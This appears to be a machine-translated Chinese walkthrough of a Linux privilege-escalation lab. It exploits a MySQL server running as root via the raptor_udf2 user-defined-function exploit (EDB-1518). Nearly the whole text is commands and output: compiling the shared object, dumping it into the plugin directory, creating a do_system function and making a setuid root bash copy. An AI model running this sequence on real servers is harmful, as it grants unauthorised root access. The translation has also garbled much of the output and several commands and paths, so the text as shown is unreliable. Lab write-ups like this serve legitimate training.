[EDB-1518]使用MySQL用户定义功能（UDF）的特权升级！ Linux Privesc写入第1部分（Linux特权升级）

SSH用户@[Machine_ip]

$ ssh user@10.10.77.90无法建立主机'10 .10.77.90（10.10.77.90）的真实性'无法建立。 RSA密钥指纹是SHA256：JWWPVFQC+8LPQDA0B9WFLZZXCXCOAHO6S8WYGJKTANK。您确定要继续连接（是/否）吗？是警告：永久添加'10 .10.77.90'（RSA）到已知主机列表中。 user@10.10.77.90's密码：Linux Debian 2.6.32-5-AMD64＃1 SMP TUE 5月13日16:34:35 UTC 2014 x86_64 exhian GNU/Linux系统包含的程序免费软件；在/usr/share/doc/*/版权所有的单个文件中描述了每个程序的确切分发术语。在适用法律允许的范围内，Debian GNU/Linux绝对没有保修。上次登录：星期五5月15日06:41:23 2020从192.168.1.125

$ id uid = 1000（用户）gid = 1000（用户）组= 1000（用户），24（cdrom），25（ploppy），29（音频），30（dip），44（视频），46（publdev）

netstat -tulpn

root@debian：〜＃netstat -tulpn主动Internet连接（仅服务器）proto recv-q s send-q send-q本地地址外部地址状态pid/program name tcp 0 0 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0 :* 0.0.0.0：52341 0.0.0.0 :**听 -  TCP 0 0 0 0.0.0.0.0:22 0.0.0.0.0.0 :**听1837/sshd TCP 0 0 0 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.4 2380/exim4 TCP 0 0 0.0.0.0:2049 0.0.0.0.0 :*听听-TCP 0 0 0.0.0.0.0.0.0:49379 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.bh 1661/apache2 tcp6 0 0 :::22 :::* LISTEN 1837/sshd udp 0 0 0.0.0.0:68 0.0.0.0:* 1169/dhclient udp 0 0 0.0.0.0:60102 0.0.0.0:* 1627/rpc.mountd udp 0 0 0.0.0.0:57929 0.0.0.0 :** 1231/rpc.statd udp 0 0 127.0.0.0.0.0.0.0.1：983 0.0.0.0.0.0.0.0.0.0.4 :* 1231/rpc.statd udp 0 0 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.bhiss-1199/portmap udp 0 0 0 0.0.0.0.0.0.0.0.0.0.0.0.44444152 ext 0.0.0.0：2049 0.0.0.0 :*  -       

PS -EF | grep mysql

root@debian：〜＃ps -ef | grep mysql root 1866 1 0 08:53？ 00:00:00/bin/sh/usr/bin/mysqld_safe root 2000 1866 0 08:53？ 00:00:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysqld --user=root --pid-file=/var/run/mysqld/mysqld.pid --socket=/var/run/mysqld/mysqld.sock --port=3306 root 2001 1866 0 08:53 ? 00：00:00 logger -t mysqld -p daemon.Error root 2502 2481 0 09:00 PTS/0 00:00:00 GREP MYSQL

mysql -v

root@debian：〜＃mysql -v mysql ver 14.14分布5.1.73，用于debian-linux-gnu（x86_64）使用readline 6.1

mysql -U根

root@debian：〜＃mySQL -U根欢迎来到MySQL监视器。命令以;或\ g。您的MySQL连接ID是35服务器版本：5.1.73-1+DEB6U1（Debian）版权（C）2000，2013，Oracle和/或其分支机构。版权所有。 Oracle是Oracle Corporation和/或其分支机构的注册商标。其他名称可能是其各自所有者的商标。输入“帮助;”或“ \ h”寻求帮助。键入“ \ c”以清除当前输入语句。 mysql> 

mysql>显示赠款； + ---+ | root@localhost的赠款| + -----+ |将所有特权授予 *。 *授予'root'@'localhost'的授予选项| + ----+ 1行（0.00秒）

mysql>显示“ secure_file_priv”之类的变量; + ---+ | variable_name |值| + -----+ | Secure_file_priv | | +----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

mysql>显示“ plugin_dir”之类的变量; + ---+ | variable_name |值| + -----+ | Plugin_dir | /usr/lib/mysql/插件| +-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

CD/var/log/apache2 -bash：cd：/var/log/apache2：拒绝权限

user@debian：〜$ cd/home/user/tools/mysql-udf用户@debian：〜/tools/mysql-udf $ ll总计4 -rw-r-r- r-- r-- r-- 1用户3378 5月15日2020年5月15日2020 RAPTOR_UDF2.C

user@debian：〜/tools/mysql -udf $ gcc -g -c raptor_udf2.c -fpic user@debian：〜/tools/mysql -udf $ gcc -g -g -g -sshared -wl，-soname，-soname，raptor_udf2.so -o raptor_udf2.so raptor_udf2.so raptor_udf.2.so raptor_udf2.o -lc-lc

user@debian：〜/tools/mysql -udf $ mysql -u root欢迎来到MySQL监视器。命令以;或\ g。您的MySQL连接ID是35服务器版本：5.1.73-1+DEB6U1（Debian）版权（C）2000，2013，Oracle和/或其分支机构。版权所有。 Oracle是Oracle Corporation和/或其分支机构的注册商标。其他名称可能是其各自所有者的商标。输入“帮助;”或“ \ h”寻求帮助。键入“ \ c”以清除当前输入语句。 mysql>

mysql>使用mysql;阅读表信息以完成表格和列名，您可以关闭此功能，以获取更快的启动-A数据库

mysql> Create table foo（line blob）;查询OK，0行影响（0.01 sec）mysql>插入foo values（load_file（'/home/home/user/user/tools/mysql-udf/raptor_udf2.so'）））;查询OK，1行影响（0.00 sec）mysql>从foo中选择 *从foo'indumpfile'/usr/lib/mysql/plugin/raptor_udf2.so';查询好的，1行影响（0.00秒）

mysql>创建函数do_system返回整数soname'raptor_udf2.so';查询好的，0行影响（0.00秒）

mysql> select do_system（'cp /bin /bash /tmp /rootbash; chmod +xs /tmp /rootbash'）; + -----+ | do_system（'cp /bin /bash /tmp /rootbash; chmod +xs /tmp /rootbash'）| +------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- +---+ 1 row in set （0.01秒）

mysql>退出再见

user@debian：〜/tools/mysql-udf $/tmp/rootbash -p rootbash-4.1＃

rootbash-4.1＃cd/var/log/apache2 rootbash-4.1＃ls access.log error.log error.log.log.2.gz access.log.1 error.1 error.log.1其他_vhosts_access.log